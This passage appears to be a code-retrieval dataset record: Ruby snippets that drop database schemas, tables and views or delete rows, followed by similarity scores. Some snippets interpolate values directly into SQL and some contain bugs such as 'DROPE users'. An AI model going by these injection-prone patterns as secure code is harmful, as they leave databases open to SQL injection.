"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def destroy\n @programming_language.destroy\n respond_to do |format|\n format.html { redirect_to programming_languages_url, notice: 'Programming language was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def db_remove prod\n $db.query \"DELETE FROM produtos WHERE prod=?\", prod\nend",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete()\n db = PG.connect({ dbname: 'Music_Collection', host: 'localhost'})\n sql = \n \"\n DELETE FROM Music_Collection where id = #{@id};\n \"\n db.exec(sql)\n db.close()\nend",
"def remove_stock(db,stock_ticker)\r\n db.execute(<<-SQL\r\n DELETE FROM stocks2 \r\n Where stock_ticker=\"#{stock_ticker}\";\r\n SQL\r\n )\r\n puts \"===================================================\"\r\n puts \"#{stock_ticker} has been removed from the database.\"\r\n puts \"===================================================\"\r\nend",
"def remove_language\n expression_language = ExpressionLanguage.find(params[:expression_language_id]) unless params[:expression_language_id].blank?\n @expression = expression_language.expression\n \n if !expression_language.blank?\n if expression_language.destroy\n # update related work for solr indexing\n work = @expression.work\n work.save\n end\n end\n \n render :partial => 'languages_form', :locals => { :expression => @expression }\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def down\n \t# Example\n \t# Easy to undo something you create, but this doesn't work\n \t# because it is hard to fix mistakes.\n \t# drop_table :pictures\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def uninstall!(database)\n drop_extension(database)\n make_uninstall(database)\n end",
"def delete_db_post\n # Tell the user\n puts \"> Tar bort aliaset från databasen\".green\n\n # Connect to the database\n conn = PG.connect( dbname: DB_DATABASE_NAME, user: DB_USER, password: DB_PASSWORD )\n\n # Delete the account\n res = conn.exec \"DELETE FROM #{DB_ALIAS_TABLE} WHERE address = '#{$alias}' AND userid = '#{$email}'\" unless $simulate\n\n # Close the connection\n conn.close\nend",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def destroy\n @language_user.destroy\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def clearSQL(fc)\n File.open(\"data/insert-#{fc}.sql\", 'w') do |file|\n file.puts(\"\")\n end\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def delete() # EXTENSION\n sql = \"DELETE FROM films WHERE id = $1\"\n values = [@id]\n SqlRunner.run(sql, values)\nend",
"def delete_db_post domain\n # Tell the user\n puts \"> Tar bort domänen från databasen\".green\n\n # Connect to the database\n conn = PG.connect( dbname: DB_DATABASE_NAME, user: DB_USER, password: DB_PASSWORD )\n\n # Delete the domain\n conn.exec \"DELETE FROM #{DB_DOMAINS_TABLE} WHERE domain = '#{domain['domain']}'\" unless $simulate\n\n # Should we also delete the accounts for the domain?\n if $delete_accounts\n # Tell the user\n puts \"> Tar bort tillhörande e-postkonton från databasen\".green\n # Delete the accounts\n conn.exec \"DELETE FROM #{DB_ACCOUNTS_TABLE} WHERE userid LIKE '%@#{domain['domain']}'\" unless $simulate\n end\n\n # Close the connection\n conn.close\nend",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def delete_symptom(db, id)\n $db.execute( <<-SQL\n DELETE FROM symptoms\n WHERE id=\"#{id}\";\n SQL\n )\nend",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def destroy\n if @language[:default] ='true'\n Language.where(\"id != #{@language[:id]}\").first().update_attributes(:default => true)\n end\n if @language.destroy\n flash[:notice] = I18n.t('admin.languages.destroy.success', :name => @language.name)\n else\n flash[:notice] = I18n.t('admin.languages.destroy.failure', :name => @language.name)\n end\n\n redirect_to :action => :index\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def destroy\n @admin_language = Language.find(params[:id])\n @admin_language.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @my_sql.destroy\n respond_to do |format|\n format.html { redirect_to my_sqls_url, notice: 'My sql was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @accountadmin_language = AccountadminLanguage.find(params[:id])\n @accountadmin_language.destroy\n\n unless @accountadmin_language.errors.empty?\n flash[:notice] = \"WARNING: Couldn't delete language because:\"\n @accountadmin_language.errors.full_messages.each { |m| flash[:notice] << \"<br/>\" << m }\n end\n\n respond_to do |format|\n format.html { redirect_to(accountadmin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def delete_translations\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def db_deleter(database, id)\n database.execute(\"DELETE FROM wine_cellar where id=#{id}\")\nend",
"def drop_sequence(repository, property)\n without_notices { execute(drop_sequence_statement(repository, property)) }\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def cleanup_db_yml(*args)\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end"
] |
[
"0.74222535",
"0.68442863",
"0.6644301",
"0.6460011",
"0.6444636",
"0.6371063",
"0.6324901",
"0.6263596",
"0.6263596",
"0.6256065",
"0.6241722",
"0.62375337",
"0.620885",
"0.6179907",
"0.61783373",
"0.6157233",
"0.6125394",
"0.60962826",
"0.60942584",
"0.607084",
"0.60548294",
"0.6037075",
"0.600055",
"0.5996706",
"0.59909135",
"0.5984927",
"0.5973377",
"0.5966148",
"0.5964057",
"0.5963785",
"0.5934631",
"0.59221005",
"0.58743095",
"0.5870775",
"0.5867548",
"0.5863949",
"0.5859687",
"0.5836754",
"0.5827448",
"0.58038783",
"0.5798652",
"0.57819015",
"0.5753994",
"0.57518834",
"0.5749225",
"0.5749225",
"0.5738356",
"0.5736759",
"0.5718073",
"0.5708343",
"0.5684972",
"0.5677155",
"0.55822307",
"0.5579967",
"0.55756146",
"0.5575608",
"0.5574096",
"0.5571629",
"0.5553795",
"0.5544688",
"0.5543769",
"0.55046254",
"0.5495997",
"0.54923177",
"0.5476139",
"0.54747033",
"0.54653376",
"0.5459103",
"0.5446619",
"0.54343605",
"0.5430078",
"0.5425848",
"0.54213744",
"0.5413116",
"0.5412068",
"0.5406446",
"0.5400202",
"0.53889084",
"0.537983",
"0.5378402",
"0.5376148",
"0.53715605",
"0.5363693",
"0.53552765",
"0.53466356",
"0.53449094",
"0.53423166",
"0.5336788",
"0.53208226",
"0.5309627",
"0.5304734",
"0.5292975",
"0.5292975",
"0.52885246",
"0.52803475",
"0.5260837",
"0.52524304",
"0.524564",
"0.52364933",
"0.5229356"
] |
0.81428945
|
0
|
SQL for dropping a schema from the database.
|
def drop_schema_sql(name, opts=OPTS)
"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}"
end
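
The same pattern applies here; a hedged sketch using the drop_schema wrapper visible among the candidates above, with DB again an assumed Sequel PostgreSQL connection and the schema name purely illustrative.

# Hedged sketch; note the name passes through quote_identifier,
# hence the double quotes in the emitted SQL.
DB.drop_schema(:staging)
# => DROP SCHEMA "staging"
DB.drop_schema(:staging, if_exists: true, cascade: true)
# => DROP SCHEMA IF EXISTS "staging" CASCADE

Unlike the language name in the earlier helper, which is interpolated raw, the schema name is quoted, so mixed-case or reserved-word schema names survive intact.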
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def unload_schema(schema_name)\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_tables!\n migrate(:down)\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def destroy_schema\n Apartment::Tenant.drop(schema_name)\n Rails.logger.info(\"Tenant dropped: #{schema_name}\")\n rescue Apartment::TenantNotFound => e\n Rails.logger.warn(\"Failed to drop tenant (not found): #{schema_name}\")\n raise e if Rails.env.production? # Don't raise an exception in dev mode so to allow seeds to work\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def drop_audit_schema!\n @config[:drop_audit_schema] = true\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def truncate_db\n drop_table\n create_table\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def migrate!\n @logger.fine('Dropping schema...')\n\n migrate(0) # migrate to version 0.\n migrate # migrate to latest version.\n end",
"def clean_schema\n # AppControl.restart_server # if Rails.env.production?\n ActiveRecord::Base.connection.schema_cache.clear!\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def reset\n tables = MODELS + [ENV['SCHEMA_TABLE']]\n tables.each { |t|\n DB << \"DROP TABLE IF EXISTS #{t.inspect};\"\n }\nend",
"def db_destroy_postgresql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{dropdb})\n\n\t\t\tinfo = db_parse_db_uri_postgresql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-U')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\tprint()\n\t\t\t\tprint_status(\"Warning: You will need to enter the password at the prompts below\")\n\t\t\t\tprint()\n\t\t\t\targv.push('-W')\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-p')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"dropdb #{cargs} #{info[:name]}\")\n\t\tend",
"def drop_database\n puts \"Droping database #{@db_name}...\"\n begin\n client = Mysql2::Client.new(:host => @db_host, :username => @db_user, :password => @db_pass)\n client.query(\"DROP DATABASE IF EXISTS #{@db_name}\")\n client.close\n rescue Exception => e\n puts \"An error occurred\\n #{e}\"\n end\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_database\n options = { database: Orientdb::ORM.connection_uri.database, user: Orientdb::ORM.connection_uri.user, password: Orientdb::ORM.connection_uri.password }\n Orientdb::ORM.with { |conn| conn.client.delete_database( options ) }\nend",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))} ON #{quote_schema_table(table)}\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop(database = \"\", user=\"\", password=\"\")\n if (user.empty?)\n user = @user\n end\n if (password.empty?)\n password = @password\n end\n if (database.empty?)\n database = @database\n end\n check_params(user,password,database)\n\n cmd = \"mysql --user=#{user} --password=#{password} -e 'drop database #{database};' #{database}\"\n # puts \"cmd = \" + cmd\n system cmd\n end",
"def db_destroy_mysql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{mysqladmin})\n\n\t\t\tinfo = db_parse_db_uri_mysql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-u')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\targv.push('--password=' + info[:pass])\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-P')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\targv.push(\"-f\")\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"mysqladmin -f #{cargs} drop #{info[:name]}\")\n\t\tend",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def drop_table(table)\n connection.drop_collection(database,table)\n end",
"def destroy\n @schema_table.destroy\n respond_to do |format|\n format.html { redirect_to schema_tables_url, notice: 'Schema table was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy_constraints_statement(table_name, constraint_name)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_constraint_name(constraint_name)}\n EOS\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def remove_tables_from_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} DROP TABLE #{safe_list(tables)}\")\n end",
"def drop_db( path_names )\n path_name_tokens = path_names.split( \"|\" )\n zone = path_name_tokens[1]\n connect_for( zone ) do |con|\n db_name = path_name_tokens.pop\n con.drop_database( db_name )\n end\n end",
"def drop(environment: :development)\n db = config(environment: environment).fetch(\"database\")\n File.delete(db) if File.exist?(db)\n end"
] |
[
"0.8680619",
"0.85794634",
"0.85016835",
"0.84340376",
"0.8426357",
"0.829404",
"0.82850105",
"0.8108252",
"0.80193865",
"0.8011835",
"0.77801085",
"0.74915457",
"0.7473172",
"0.746467",
"0.74538666",
"0.7438913",
"0.7438811",
"0.73444384",
"0.73317754",
"0.7308943",
"0.7280758",
"0.7271184",
"0.714929",
"0.7064724",
"0.7055206",
"0.6999474",
"0.6913484",
"0.6907225",
"0.6897807",
"0.68721247",
"0.68402153",
"0.68003166",
"0.67787707",
"0.67613256",
"0.6747003",
"0.6736786",
"0.67274463",
"0.6699812",
"0.6661077",
"0.6646018",
"0.6557036",
"0.65480155",
"0.65236425",
"0.6489998",
"0.64857954",
"0.6483834",
"0.64651453",
"0.6454189",
"0.6453989",
"0.6431793",
"0.6414508",
"0.6380541",
"0.63698435",
"0.6344371",
"0.63368136",
"0.63310134",
"0.6312857",
"0.63037103",
"0.6303456",
"0.6303147",
"0.6303147",
"0.62534547",
"0.62534547",
"0.62500036",
"0.6245522",
"0.6239918",
"0.6235864",
"0.6227832",
"0.61864",
"0.6172624",
"0.61584526",
"0.6143514",
"0.6141624",
"0.61408865",
"0.6113451",
"0.6111409",
"0.60908175",
"0.6072674",
"0.6069633",
"0.6063831",
"0.6049968",
"0.6043502",
"0.6042274",
"0.6026672",
"0.6025028",
"0.59750646",
"0.5961822",
"0.5961822",
"0.5961822",
"0.59566844",
"0.59426826",
"0.5941483",
"0.5936925",
"0.5928614",
"0.5924562",
"0.5924562",
"0.59092814",
"0.58980876",
"0.58869904",
